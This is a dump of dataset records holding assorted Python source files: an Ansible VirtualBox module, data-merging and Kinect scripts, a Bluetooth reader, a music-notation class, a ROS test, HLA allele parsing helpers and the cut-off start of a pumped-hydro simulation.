arpline in arplines[+1:-1]:\n arprecord=arpline.split()\n mac=arprecord[2].replace(\":\",\"\").upper()\n ip=arprecord[0]\n arpdict[mac]=ip\n ip=arpdict.get(mac_address.upper())\n return ip\n\n\n\ndef gather_facts(vm,arp_wait_timeout_in_s,network_range,network_interface):\n facts=dict()\n if vm is None:\n facts['vb_name']='!!!VM_NOT_FOUND!!!'\n return facts\n\n facts['vb_name']=vm.name\n adapter=vm.get_network_adapter(network_interface)\n mac=adapter.mac_address\n facts['vb_mac']=mac\n if not is_machine_stopped(vm):\n facts['vb_ip']=find_ip_using_arp(mac,arp_wait_timeout_in_s,network_range)\n return facts\n\n\ndef main():\n # This module WANT_JSON (do not change this comment, because Ansible uses it)\n module = AnsibleModule(\n argument_spec = dict(\n state = dict(default='running', choices=['present', 'absent', 'running','stopped']),\n name = dict(required=True),\n memory = dict(default=1024),\n nbcpu = dict(default=1),\n arp_wait_timeout = dict(default='60'),\n template = dict(default='ubuntu'),\n network_range = dict(default=\"0.0.0.0-0\"),\n network_interface = dict(default=1)\n )\n )\n\n # fill this with info that you want added to the ansible environment\n # http://docs.ansible.com/developing_modules.html#module-provided-facts\n facts = dict()\n name=module.params['name']\n target_state=module.params['state']\n template=module.params['template']\n arp_wait_timeout=module.params['arp_wait_timeout']\n memory=int(module.params['memory'])\n nbcpu=int(module.params['nbcpu'])\n network_range=module.params['network_range']\n network_interface=int(module.params['network_interface'])\n vm=get_machine(name)\n changed=False\n facts=gather_facts(vm,arp_wait_timeout,network_range,network_interface)\n\n if target_state=='absent':\n if vm is None:\n module.exit_json(changed=False, msg=\"VM does not exist\", ansible_facts=facts)\n else:\n if module.check_mode:\n module.exit_json(changed=True, msg=\"VM has to be destroyed\", ansible_facts=facts)\n delete_machine(vm)\n module.exit_json(changed=True, msg=\"VM has been destroyed\", ansible_facts=facts)\n else:\n if vm is None:\n if module.check_mode:\n module.exit_json(changed=True, msg=\"VM has to be created\", ansible_facts=facts)\n else:\n vm=create_machine(template,name)\n facts=gather_facts(vm,arp_wait_timeout,network_range,network_interface)\n changed=True\n if target_state=='stopped':\n if not is_machine_stopped(vm):\n facts=gather_facts(vm,arp_wait_timeout,network_range,network_interface)\n if module.check_mode:\n module.exit_json(changed=True, msg=\"VM has to be stopped\", ansible_facts=facts)\n stop_machine(vm)\n module.exit_json(changed=True, msg=\"VM was stopped\", ansible_facts=facts)\n elif target_state=='running':\n if is_machine_stopped(vm):\n if module.check_mode:\n module.exit_json(changed=True, msg=\"VM has to be started\", ansible_facts=facts)\n start_machine(vm,memory,nbcpu)\n facts=gather_facts(vm,arp_wait_timeout,network_range,network_interface)\n module.exit_json(changed=True, msg=\"VM was started\", ansible_facts=facts)\n facts=gather_facts(vm,arp_wait_timeout,network_range,network_interface)\n if changed:\n module.exit_json(changed=True, msg=\"VM was created\", ansible_facts=facts)\n module.exit_json(changed=False, msg=\"did nothing\", ansible_facts=facts)\n # ... otherwise, if failure\n # module.fail_json(msg=\"explain why the module failed here\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ansible/library/virtualboxvm.py","file_name":"virtualboxvm.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"6330101","text":"import pandas as pd\nfrom submodules import data_io\n\ndef dataset_to_dataframe( text, label, file_name ):\n df = pd.DataFrame( { 'text' : text,\n 'sentiment_numeric':label } )\n df.to_csv( file_name, sep=\";\", index=None )\n\n\nif __name__ ==\"__main__\":\n CHUNKS_PATH = \"chunks/yahoo_data_sentiment_classification_chunk_{}.csv\"\n CHUNK_LEN = 5\n all_source_sentences, all_labels = data_io.load_data_from_chunks( CHUNKS_PATH, CHUNK_LEN )\n\n chunk1_sentences = all_source_sentences[0]\n chunk1_labels = all_labels[0]\n\n chunk2_sentences = all_source_sentences[1]\n chunk2_labels = all_labels[1]\n\n chunk3_sentences = all_source_sentences[2]\n chunk3_labels = all_labels[2]\n\n chunk4_sentences = all_source_sentences[3]\n chunk4_labels = all_labels[3]\n\n chunk5_sentences = all_source_sentences[4]\n chunk5_labels = all_labels[4]\n\n dataset_to_dataframe( chunk1_sentences, chunk1_labels, 'yahoo_growing_dataset/yahoo_growing_dataset_1.csv' )\n\n vergleichsnetz_zweites_trainingsset_sentences= chunk1_sentences + chunk2_sentences\n vergleichsnetz_zweites_trainingsset_labels = chunk1_labels + chunk2_labels\n dataset_to_dataframe( vergleichsnetz_zweites_trainingsset_sentences, vergleichsnetz_zweites_trainingsset_labels, 'yahoo_growing_dataset/yahoo_growing_dataset_2.csv' )\n\n\n vergleichsnetz_drittes_trainingsset_sentences = chunk1_sentences + chunk2_sentences + chunk3_sentences\n vergleichsnetz_drittes_trainingsset_labels = chunk1_labels + chunk2_labels + chunk3_labels\n dataset_to_dataframe( vergleichsnetz_drittes_trainingsset_sentences, vergleichsnetz_drittes_trainingsset_labels, 'yahoo_growing_dataset/yahoo_growing_dataset_3.csv' )\n\n\n vergleichsnetz_viertes_trainingsset_sentences = chunk1_sentences + chunk2_sentences + chunk3_sentences + chunk4_sentences\n vergleichsnetz_viertes_trainingsset_labels = chunk1_labels + chunk2_labels + chunk3_labels + chunk4_labels\n dataset_to_dataframe( vergleichsnetz_viertes_trainingsset_sentences, vergleichsnetz_viertes_trainingsset_labels, 'yahoo_growing_dataset/yahoo_growing_dataset_4.csv' )\n\n\n vergleichsnetz_fuenftes_trainingsset_sentences = chunk1_sentences + chunk2_sentences + chunk3_sentences + chunk4_sentences + chunk5_sentences\n vergleichsnetz_fuenftes_trainingsset_labels = chunk1_labels + chunk2_labels + chunk3_labels + chunk4_labels + chunk5_labels\n dataset_to_dataframe( vergleichsnetz_fuenftes_trainingsset_sentences, vergleichsnetz_fuenftes_trainingsset_labels, 'yahoo_growing_dataset/yahoo_growing_dataset_5.csv' )\n","sub_path":"experiment_4.5.1_shared_datapool/experiment_yahoo/merge_chunks.py","file_name":"merge_chunks.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341676462","text":"#!/usr/bin/env python\nimport freenect\nimport cv2\nimport numpy as np\n\n\nthreshold = 100\ncurrent_depth = 0\n\ndef change_threshold(value):\n global threshold\n threshold = value\n\n\ndef change_depth(value):\n global current_depth\n current_depth = value\n\n\ndef show_depth():\n global threshold\n global current_depth\n\n depth, timestamp = freenect.sync_get_depth()\n depth = 255 * np.logical_and(depth >= current_depth - threshold,\n depth <= current_depth + threshold)\n depth = depth.astype(np.uint8)\n cv2.imshow('Depth', depth)\n\n\ndef show_video():\n cv2.imshow('Video', freenect.sync_get_video(format=freenect.VIDEO_IR_8BIT)[0])\n\n\ncv2.namedWindow('Depth')\ncv2.namedWindow('Video')\ncv2.createTrackbar('threshold', 'Depth', threshold, 500, change_threshold)\ncv2.createTrackbar('depth', 'Depth', current_depth, 2048, change_depth)\n\nprint('Press ESC in window to stop')\n\n\nwhile 1:\n show_depth()\n show_video()\n if cv2.waitKey(10) == 27:\n break\n","sub_path":"test_files/getting_frames_without_ano_obj.py","file_name":"getting_frames_without_ano_obj.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"368719276","text":"class BenchCommandBuilder():\n\n def buildCommandString(self, inDir, outDir, cmd, args):\n pythonPath = \"/usr/bin/python\"\n benchPath = \"./\"\n\n benchCommand = 'bench.py --save res.csv --cases ' + inDir\n\n if outDir != None and len(outDir) > 0:\n benchCommand = benchCommand + ' --output ' + outDir\n\n benchCommand = benchCommand + ' ' + cmd\n\n if args != None and len(args) > 0:\n benchCommand = benchCommand + ' ' + args\n\n return pythonPath + ' ' + benchPath + benchCommand\n\n def buildCommand(self, inDir, outDir, cmd, args):\n return self.buildCommandString(inDir, outDir, cmd, args).split(\" \")\n\n","sub_path":"BenchCommandBuilder.py","file_name":"BenchCommandBuilder.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"610837280","text":"#Must be run after arduino starts sending\nfrom bluetooth import *\nimport requests,json\n\nurl = \"http://127.0.0.1:5000/sposition\"\nclient_socket=BluetoothSocket(RFCOMM)\n\nclient_socket.connect((\"98:D3:51:FD:AB:20\",1))\n\ni = 0;\n\nwhile True:\n msg = client_socket.recv(255) #1024\n \n if msg == '[':\n continue\n else : \n msg = msg.replace('[','') #all sorts of exceptions\n msg = msg.replace('\\r','')\n dic = msg.split('\\n')\n try:\n print([int(dic[0]),int(dic[1])]) #also exception-proof\n except:\n #print('error')\n continue\n \nprint(\"Finished\")\nclient_socket.close()","sub_path":"arduino_raspi_connection/raspi/connect_2.py","file_name":"connect_2.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"391271520","text":"###############################################################################\n\nfrom .voice import Voice\n\n\n## A class representing a measure of music.\nclass Bar:\n ## Initializes a Bar and its seven attributes self.id, self.clef,\n # self.key, self.meter, self.voices, self.barline, and self.partial.\n # @param bid A unique integer identifier for the bar's id attribute.\n # @param clef A Clef for the bar's clef attribute. Defaults to None.\n # @param key A Key for the bar's measure attribute. Defaults to None.\n # @param meter A Meter for the bar's meter attribute. Defaults to None.\n # @param barline A Barline for the bar's barline attribute.\n # Defaults to None.\n # @param partial A boolean value for the bar's partial attribute. If true\n # the bar is an incomplete (e.g. pickup) measure. Defaults to False.\n #\n # Initialize self.voices to an empty list and self.staff to None.\n # See also: Staff, Voice, https://en.wikipedia.org/wiki/Bar_(music)\n def __init__(self, bid, clef=None, key=None, meter=None, barline=None, partial=False):\n self.id = bid\n self.clef = clef\n self.key = key\n self.meter = meter\n self.barline = barline\n self.partial = partial\n self.voices = []\n self.staff = None\n\n ## Returns a string showing the bars unique id and all attributes\n # except self.voices if that attribute is not None. The order of\n # printing is id, clef, key, meter, barline, followed by the\n # hex id of the instance.\n # Example: ''\n def __str__(self):\n to_return = ''\n\n ## Define __repr__ to be the same as __str__ except there is\n # no hex id included.\n # Example: ''\n def __repr__(self):\n to_return = ''\n\n ## Implements Bar iteration by returning an iterator for the bar's\n # voices. See: Python's iter() function.\n def __iter__(self):\n return iter(self.voices)\n\n ## Appends a Voice to the bars's voice list and assigns\n # itself to the voice's bar attribute.\n # @param voice The Voice to append to the bar's voice list.\n # The method should raise a TypeError if voice is not a Voice instance.\n def add_voice(self, voice):\n if isinstance(voice, Voice):\n self.voices.append(voice)\n else:\n raise TypeError(\"voice is not a Voice instance\")\n\n ## Returns the bar's voice identifiers in the same order\n # that they occur in the voices list.\n def voice_ids(self):\n return [voice.id for voice in self.voices]\n\n ## Returns the number of voices in the bar.\n def num_voices(self):\n return len(self.voices)\n\n","sub_path":"hw7/score/bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"524573294","text":"#!/usr/bin/env python3\n\nPKG = 'lg_common'\nNAME = 'test_adhoc_browser_director_bridge'\n\nimport rospy\nimport unittest\n\nfrom lg_common import ManagedAdhocBrowser\nfrom lg_msg_defs.msg import WindowGeometry, ApplicationState\n\nfrom lg_common.logger import get_logger\nlogger = get_logger('test_managed_adhoc_browser')\n\n\nclass TestManagedAdhocBrowser(unittest.TestCase):\n def setUp(self):\n \"\"\"\n - instantiate ManagedAdhocBrowser\n - run asserts on object's parameters\n \"\"\"\n\n self.width = 1000\n self.height = 1001\n self.x = 1002\n self.y = 1003\n self.slug = 'testing_slug'\n self.url = 'http://justtesting.com'\n\n self.geometry = WindowGeometry(width=self.width,\n height=self.height,\n x=self.x,\n y=self.y)\n self.mab = ManagedAdhocBrowser(geometry=self.geometry,\n slug=self.slug,\n url=self.url)\n\n super(ManagedAdhocBrowser, self.mab).__init__(\n geometry=self.geometry,\n slug=self.slug,\n url=self.url,\n kiosk=True)\n logger.debug(\"This is mab: %s\" % self.mab.__dict__)\n\n def test_1_run_basic_asserts(self):\n \"\"\"\n Check if managed adhoc browsers parameters are set properly\n \"\"\"\n self.assertEqual(self.width, self.mab.geometry.width)\n self.assertEqual(self.height, self.mab.geometry.height)\n self.assertEqual(self.x, self.mab.geometry.x)\n self.assertEqual(self.y, self.mab.geometry.y)\n self.assertEqual(self.slug, self.mab.slug)\n self.assertEqual(self.url, self.mab.url)\n self.assertEqual(ApplicationState.STOPPED, self.mab.state)\n self.assertTrue((self.url in self.mab.cmd))\n self.assertTrue(('--kiosk' in self.mab.cmd))\n\n\nif __name__ == '__main__':\n import rostest\n rostest.rosrun(PKG, NAME, TestManagedAdhocBrowser)\n","sub_path":"lg_common/test/offline/test_managed_adhoc_browser.py","file_name":"test_managed_adhoc_browser.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"611521444","text":"import numpy as np\nimport re\n\n\ndef textFeature2Digit(feature,word2Idx):\n \n numList=[]\n eventNum=len(feature.runableList)\n \n for index in range(eventNum):\n textInOne=feature.runableList[index].text\n \n wordList=re.findall(r\"[\\w']+|[.,!?;]\", textInOne.lower())\n \n oneRunArray=np.array([])\n \n maxVal=20 #how many word in a sentence\n count=0\n for word in wordList:\n if count 0, Arruco marker -> 1\nD.TRACKER_TYPE = D.LED_ENUM #D.ARUCCO_ENUM # D.LED_ENUM\n\nD.THETA = 0\nD.LENGTH = 5 #mm\n\nif D.TRACKER_TYPE is D.LED_ENUM:\n # Robot settings \n D.ROB_CNTR = (50, 25) # x, y\n D.HEADING = 0\n D.DIAMETER = 10 #15#10 \n D.AXLE_LEN = 7 #10 #7\n D.WHEEL_RADIUS = 2\n # Simulator settings\n D.W_HEIGHT = 840#588#640\n D.W_WIDTH = 1480#1036#1280\n D.LED_RADIUS = 12#15#7#8 #px\n\n D.SIDEPIXEL_ARUCO = 100#100\n\n D.SIM_ERROR = 0.15*D.W_WIDTH/D.AREA_WIDTH_REAL\n \nelif D.TRACKER_TYPE is D.ARUCCO_ENUM:\n # Robot settings \n D.ROB_CNTR = (50, 25) # x, y\n D.HEADING = 0\n D.DIAMETER = 20 #20#15#10 \n D.AXLE_LEN = 14 #17#10 #7\n D.WHEEL_RADIUS = 2\n # Simulator settings\n D.W_HEIGHT = 840#588#640\n D.W_WIDTH = 1480#1036#1280\n D.LED_RADIUS = 12#15#7#8 #px\n D.SIDEPIXEL_ARUCO = 100#100\n D.ARUCO_SIDE_PIXELS = 80\n\n D.SIM_ERROR = 3\n\n#############\nD.D_MARGIN_HORIZONTAL = (150, 10) #(L,R)\nD.D_MARGIN_VERTICAL = (10, 10)\nD.FONT = cv.FONT_HERSHEY_SIMPLEX\n \nD.D_WIDTH = D.W_WIDTH - D.D_MARGIN_HORIZONTAL[0] - D.D_MARGIN_HORIZONTAL[1] #Wielkosc symulacji, potrzebne do policzenia skali \nD.D_HEIGHT = D.W_HEIGHT - D.D_MARGIN_VERTICAL[0] - D.D_MARGIN_VERTICAL[1] # w odniesieniu do wielkosci wykrytego oknaprzez kamere\n\n\nD.LED_THICKNES = -1#8 \nD.ROBOT_THICKNESS = 3\n\nD.AREA_POINTS = [(10,10), (-10,-10)] #punkty pola dodawane marginesy wys szer\nD.AREA_THICKNESS = 4\n\n#Settings for arruco markers and enums\nD.ARUCO_DICT = aruco.DICT_ARUCO_ORIGINAL #aruco.DICT_4X4_50\nD.ROBOT_ID = 0\nD.UPPER_LEFT_ID = 1\nD.UPPER_RIGHT_ID = 2\nD.BOTTOM_RIGHT = 3\nD.BOTTOM_LEFT = 4\nD.CORNER_IDS = [D.UPPER_LEFT_ID, D.UPPER_RIGHT_ID, D.BOTTOM_RIGHT, D.BOTTOM_LEFT]\nD.MARGIN_ARUCO = 40 #30\n\n#Settings for PID controller\n#angular controll\n\n\n# ehading\nD.PROPORTIONAL1 = 2.0 #proporcjonalny\nD.INTEGRAL1 = 0.2 #całka\nD.DERIVATIVE1 = 0.001 #pochodna\n\nD.PROPORTIONAL2 = 1.0\nD.INTEGRAL2 = 1.0\nD.DERIVATIVE2 = 0.001\n\nD.VEL = 200\n\n \n#Choose leds order, when LEFT_LD = 0 that refer to led on the side wihich robot is turing going forward-left \nD.LEFT_LD = 0\n\nD.RIGHT_LD = 1\n\n######################## \n#D.VIDEO_PATH = 0 #1 eeye3 mch faster\n#D.VIDEO_PATH = normpath(r'C:/Users/barte/Documents/Studia VII/Image_processing/Assets/Green_Blue_Led.avi')\nD.VIDEO_PATH = 1\n\nD.NUM_FRAMES_TO_SKIP = 0\n\nD.PLAY_IN_LOOP = False\n\nD.FRAME_RATE = 0\n\nD.SHOW_PATH = False\n\nD.MARKER_PREVIEW = True\n\n######################## \nD.AUTO_LOAD_THRESHOLDS = False\n\nD.THRESHOLDS_FILE_PATH = r\"C:\\Users\\barte\\Documents\\Studia VII\\Image_processing\\TadroBeaconTracker\\tadro-tracker\\thresh.txt\"\n\nD.SAVE_POSNS = True\n######################## \nD.CAMERA_CALIBRATION_UNDISTORT = False\n\nD.CAMERA_CALIBRATION_PATH = r'C:\\Users\\barte\\Documents\\Studia VII\\Image_processing\\TadroBeaconTracker\\tadro-tracker\\2Led\\calibration_images\\cam_calibration_data.p'\n\nD.NUM_CALIBRATION_TO_SKIP = 0\n\n######################## \nD.ADAPTIVE_THRESHOLD = True\n\nD.HALF_SIZE = False\n\nD.THR_WIND_OFFSET = (640, 0)\n\nD.THR_WIND_SLF_OFFSET = 320\n\nD.SLD_WIND_OFFSET = (640, 150) #1280\n\nD.SLD_WIND_SLF_OFFSET = 320\n","sub_path":"TadroBeaconTracker/tadro-tracker/2Led/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629480823","text":"from sklearn.datasets import load_digits\r\nfrom masaic import convert\r\ndigits = load_digits()\r\nimport numpy as np\r\n\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\n\r\nfig = plt.figure(figsize=(6,6)) # figure size in inches\r\nfig.subplots_adjust(left=0,right=1,bottom=0,top=1,hspace=0.05,wspace=0.05)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nXtrain,Xtest,ytrain,ytest = train_test_split(digits.data,digits.target,random_state=0)\r\n\r\nzero = []\r\none = []\r\ntwo = []\r\nthree = []\r\nfour = []\r\nfive = []\r\nsix = []\r\nseven = []\r\neight = []\r\nnine = []\r\n\r\nfor i in range(len(digits.data)):\r\n if digits.target[i] == 0:\r\n zero.append(digits.data[i])\r\n if digits.target[i] == 1:\r\n one.append(digits.data[i])\r\n if digits.target[i] == 2:\r\n two.append(digits.data[i])\r\n if digits.target[i] == 3:\r\n three.append(digits.data[i])\r\n if digits.target[i] == 4:\r\n four.append(digits.data[i])\r\n if digits.target[i] == 5:\r\n five.append(digits.data[i])\r\n if digits.target[i] == 6:\r\n six.append(digits.data[i])\r\n if digits.target[i] == 7:\r\n seven.append(digits.data[i])\r\n if digits.target[i] == 8:\r\n eight.append(digits.data[i])\r\n if digits.target[i] == 9:\r\n nine.append(digits.data[i])\r\n\r\nex = np.array(three[60]).reshape((8,8))\r\n\r\nex = np.array(convert(r\"C:\\Users\\Admin\\Desktop\\Python\\計程實驗\\mini_project_3\\9.png\"))\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nmodel = RandomForestClassifier(n_estimators=1000)\r\nmodel.fit(Xtrain,ytrain)\r\n\r\nprint(model.predict(ex.reshape(1,64)))\r\n\r\nplt.imshow(ex.reshape(8,8),cmap = plt.cm.binary)\r\nplt.show()","sub_path":"drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"627534973","text":"\"\"\"Welcome to the game show of Guess It, the place where you guess the message behind our clues and win big prizes!\n\nWe first give you a message, a string with lowercase alphabet letters, numbers, punctuation, and the $ symbol. This symbol could represent anything -- any length of characters, or absolutely nothing, so be careful!\n\nOnce we give you some possible options to choose from, we want you to guess which of those choices could be the message hidden behind those $ symbols. If you get all of them correct, you get a chance to win big!\n\nNote: The matching process should cover the entire message, not just a section of it.\n\nExample\n\nFor message = \"prizes$\" and options = [\"prizes!\", \"prizes?\", \"prizes :D\", \"prizes\", \"money!\", \"big prizes\", \"prizes suck\"], the output should be [\"prizes!\", \"prizes?\", \"prizes :D\", \"prizes\", \"prizes suck\"]\n\nhttps://i.imgur.com/dpp3Tjz.png\n\nIn the last section, you can place \"!\", \"?\", \" :D\", \"\", or \" suck\" to make it match the five options. No matter what you replace, you will never get \"money!\" or \"big prizes\" because of the prefix, which excludes those two options.\n\nInput / Output\n\n[execution time limit] 4 seconds (php)\n\n[input] string message\n\nA string that contains lowercase letters from a - z along with numbers, punctuation, and the $ symbol.\n\nGuaranteed Constraints:\n1 ≤ message.length ≤ 1000\nmessage[i] ∈ {\"a\" - \"z\", \"0\" - \"9\" \". , ! ? : $\"}\n\n[input] array.string options\n\nAn array that contains all the possible matches for message. These strings will also only contain lowercase letters from a - z, along with numbers and punctuation, but will never contain the $ symbol.\n\nGuaranteed Constraints:\n1 ≤ options.length ≤ 1000\n1 ≤ options[i].length ≤ 1000\noptions[i][j] ∈ {\"a\" - \"z\", \"0123456789\", \". , ! ? :\"}\n\n[output] array.string\n\nAn array of strings that could represent the hidden message without any conflicting characters. Keep the order they appear in the original array.\"\"\"\n\n#I am the author of this challenge. Here is my intended solution, which uses some backtracking and two pointers.\n\ndef guessIt(message, options):\n results = []\n for choice in options:\n ## Algorithm: Use two pointers -- i and j (one for the message, one for choice)\n # Use st and pt as places to store the location of the $ symbol\n i = j = 0\n st = pt = -1\n while i < len(choice) and len(message) > j:\n ## Case 1: Both characters are identical, and don't need to be touched\n if choice[i] == message[j]:\n i += 1\n j += 1\n ## Case 2: We find a $ symbol, so then we can store the location of the $ symbol in both strings\n # We can use this index to backtrack from later\n elif j < len(message) and message[j] == \"$\":\n pt = j\n st = i\n j += 1\n ## Case 3: Nothing matches, and we have already found a $ symbol.\n # We increment both of the stored locations by 1, indicating that the character is part of the $ symbol\n # We now go backtrack to that location\n elif pt > -1:\n j = pt + 1\n i = st + 1\n st += 1\n # Case 4: Nothing matches, and there were no previous $ symbol\n # We can just exit from the loop, because we know it's impossible\n else:\n break\n ## Excess $ symbol counts as nothing, we can remove them\n while j < len(message) and message[j] == \"$\":\n j += 1\n ## Check if we have reached the end of the string\n if j == len(message):\n results.append(choice)\n return results\n\n","sub_path":"Challenges/Published-Problems/guessIt.py","file_name":"guessIt.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"24577438","text":"# xxx!/usr/bin/python3\n#\n# updated by ...: Loreto Notarantonio\n# Version ......: 23-03-2020 17.05.39\n#\n# Progamma per convertire un ebook in text\n\n# https://pypi.org/project/epub-conversion/\ndef ePubConverter(base_path):\n import epub_conversion as Converter\n converter = Converter(base_path + \"/\")\n converter.convert(\"my_succinct_text_file.gz\")\n\ndef ePubConverter_lineByline(base_path):\n from epub_conversion.utils import open_book, convert_epub_to_lines, convert_lines_to_text\n\n local_tree_list = Ln.TreeList(base_path, 'eBook')\n for relative_folder_path in local_tree_list:\n full_folder_path = os.path.join(base_path, relative_folder_path).rstrip(os.path.sep)\n\n files = [f for f in os.listdir(full_folder_path) if os.path.isfile(os.path.join(full_folder_path, f))]\n folders = [f for f in os.listdir(full_folder_path) if os.path.isdir(os.path.join(full_folder_path, f))]\n\n for file in files:\n filename=os.path.join(full_folder_path, file)\n book = open_book(filename)\n lines = convert_epub_to_lines(book)\n ltext = convert_lines_to_text(lines)\n\n\n","sub_path":"Source/eBookProcess/eBookConverter.py","file_name":"eBookConverter.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"401490185","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\ndef strip_chars(s : str, chars_to_remove, _cache={}):\n if s in _cache:\n return _cache[s]\n original = s\n for c in chars_to_remove:\n while s and s[0] == c:\n s = s[1:]\n while s and s[-1] == c:\n s = s[:-1]\n _cache[original] = s\n return s\n\n\ndef strip_whitespace_and_dashes(s : str):\n return strip_chars(s, \"- \")\n\n\ndef smart_split(seq : str, sep : str):\n \"\"\"\n Split string on a separator and then get rid of dashes\n and empty strings\n \"\"\"\n return [strip_whitespace_and_dashes(p) for p in seq.split(sep)]\n\n\ndef split_on_all_seps(seq : str, seps=\"_:\"):\n \"\"\"\n Split given string on all separators specified\n\n For example, 02_01:01 will be split_token_sequences into:\n [\"02\", \"01\", \"01\"]\n \"\"\"\n string_parts = [seq]\n for sep in seps:\n new_parts = []\n for subseq in string_parts:\n new_parts.extend(smart_split(subseq, sep))\n parts = new_parts\n return parts\n\n\ndef split_digits_at_end(seq : str):\n \"\"\"\n Splits strings like \"A0201\" into (\"A\", \"0201\")\n \"\"\"\n prefix = seq\n suffix = \"\"\n while prefix and prefix[-1].isdigit():\n suffix = prefix[-1] + suffix\n prefix = prefix[:-1]\n return prefix, suffix\n\n\ndef contains_any_letters(s : str):\n \"\"\"\n Returns True if any characters in the sequence are letters.\n \"\"\"\n for si in s:\n if si.isalpha():\n return True\n return False\n\ndef contains_whitespace(s : str):\n \"\"\"\n Returns True if any whitespace chars in input string.\n \"\"\"\n return \" \" in s or \"\\t\" in s\n\ndef split_allele_fields(\n str_after_gene,\n allow_three_digits_in_first_field,\n allow_three_digits_in_second_field):\n if \":\" in str_after_gene:\n return str_after_gene.split(\":\")\n\n # if we don't have ':' to guide the field boundaries\n # then split_token_sequences on all possible seps and try to guess\n # which blocks of numbers are actually multiple fields.\n parts = split_on_all_seps(str_after_gene)\n\n parsed_fields = []\n failed = False\n if len(parts) == 1:\n part = parts[0]\n if len(part) in {2, 3}:\n return [part]\n\n for part in parts:\n if failed:\n break\n if part.isdigit():\n if (allow_three_digits_in_first_field and\n len(parsed_fields) == 0 and\n len(part) > 4):\n parsed_fields.append(part[:3])\n part = part[3:]\n if (allow_three_digits_in_second_field and\n len(parsed_fields) == 1 and\n len(part) > 4):\n parsed_fields.append(part[3:])\n\n while part and not failed:\n n_parsed = len(parsed_fields)\n remaining_length = len(part)\n if remaining_length == 1:\n failed = True\n break\n if (allow_three_digits_in_first_field and n_parsed == 0 and\n (remaining_length == 3 or remaining_length > 4)):\n boundary_index = 3\n elif (allow_three_digits_in_second_field and n_parsed == 1 and\n (remaining_length == 3 or remaining_length > 4)):\n boundary_index = 3\n else:\n boundary_index = 2\n parsed_fields.append(part[:boundary_index])\n part = part[boundary_index:]\n else:\n parsed_fields.append(part)\n # if failed to parse anything then back up and try to turn some of\n # the optional arguments false\n if not failed and len(parsed_fields) > 0:\n return parsed_fields\n elif allow_three_digits_in_first_field:\n return split_allele_fields(\n str_after_gene,\n allow_three_digits_in_first_field=False,\n allow_three_digits_in_second_field=allow_three_digits_in_second_field)\n elif allow_three_digits_in_second_field:\n return split_allele_fields(\n str_after_gene,\n allow_three_digits_in_first_field=False,\n allow_three_digits_in_second_field=False)\n return None\n","sub_path":"mhcgnomes/parsing_helpers.py","file_name":"parsing_helpers.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"179131588","text":"\"\"\"\nPumped Hydro Simulation\n11/6/2017\n@author: Tristan\n\"\"\"\n\n#import modules\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import rain data TBD \n\n\"\"\" \n############################################################################\nWHERE THIS FUNCTION FITS INTO THE LARGE PORTFOLIO MODEL\n\nAfter allocating nuclear, solar, onshore, offshore, and calculating NG_limit\nThen run PumpedHydroPlant function and pass in arguments below:\n\nPHES_Cap , the capacity of the PHES plant\nDemand is demand[k] , the total grid demand for the current hour\nRunning_Average , the the previous hour's running average\nRenew_Gen = Nuc_Demand[k] + Sol_Demand[k] + W_Demand[k] + W_Off_Demand[k] , the amount of power that can be generated this hour by nuclear and renewables\nRenew_Dispatched = Nuc_Cap*Nuc_Out[k] + Sol_Tot[k] + W_Tot[k] + W_Off_MWh[k] , the amount of power dispatched this hour by nuclear and renewables\nGrid_Demand_Left is New_D , the demand that still needs to be met for this hour after dispatching nuclear and renewables \nNG_Gen is NG_Limit , the amount of NG power that can be generted this hour\nPHES_state , the state the hydro plant was in the previous hour: 0 is standby, 1 is pumping, 2 is generating\nWater_Lvl , the height of the water in the upper reservoir\n\nWill pass out updated hydro variables in the following order\nNew_State, MW_To_Be_Gen, MW_To_Be_Pump, New_Water_Level, New_Average\n\n############################################################################\n\"\"\"\n\n#Water_Lvl keeps track of the water level in the upper reservoir in m\ndef PumpedHydroPlant(PHES_Cap, Demand, Running_Average, Renew_Gen, Renew_Dispatched, Grid_Demand_Left, NG_Gen, PHES_State, Water_Lvl):\n #PHES PLANT CHARACTERISTCS \n \n #y = 1.84*x - 2 where y is MW Output and x is flow rate gen, assuming hydraulic head at max\n if(PHES_Cap == 0.0):\n return 